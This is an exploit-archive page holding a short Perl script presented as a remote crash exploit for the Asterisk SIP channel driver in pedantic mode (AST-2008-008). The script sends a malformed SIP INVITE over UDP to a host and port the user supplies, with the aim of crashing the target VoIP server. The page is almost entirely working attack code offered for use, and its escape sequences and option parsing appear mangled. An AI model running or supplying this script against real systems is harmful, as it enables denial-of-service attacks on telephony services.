[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Asterisk (SIP channel driver / in pedantic mode) Remote Crash Exploit
# Published : 2008-06-05
# Author : Armando Oliveira
# Previous Title : Dana IRC <= 1.3 Remote Buffer Overflow PoC
# Next Title : MDaemon <= 9.6.5 Multiple Remote Buffer Overflow Exploit PoC 


#!/usr/bin/perl -w
###############


# asterisk AST-2008-008
# by armando.j.m.o@gmail.com
#AST-2008-008 - Remote Crash Vulnerability in SIP channel driver when run in pedantic mode

use Getopt::Std;
use IO::Socket;
use strict;

my %args;
getopts("h:p:", %args);

if (!$args{h} || !$args{p}) { usage(); }


my $sock = IO::Socket::INET->new(
    Proto    => 'udp',
    PeerPort => $args{p},
    PeerAddr => $args{h},
) or die "Could not create socket: $!n";

$sock->send('INVITE sip:1234@'.$args{h}.' SIP/2.0n
CSeq: 2 INVITE') or die "Send error: $!n";




sub usage {
    print STDERR
qq{ $0

Usage: $0 -h <host> -p <port>
        -h <host>       = host
        -p <port>       = port

Example:
        $0 -h target -p port


};

# www.Syue.com [2008-06-05]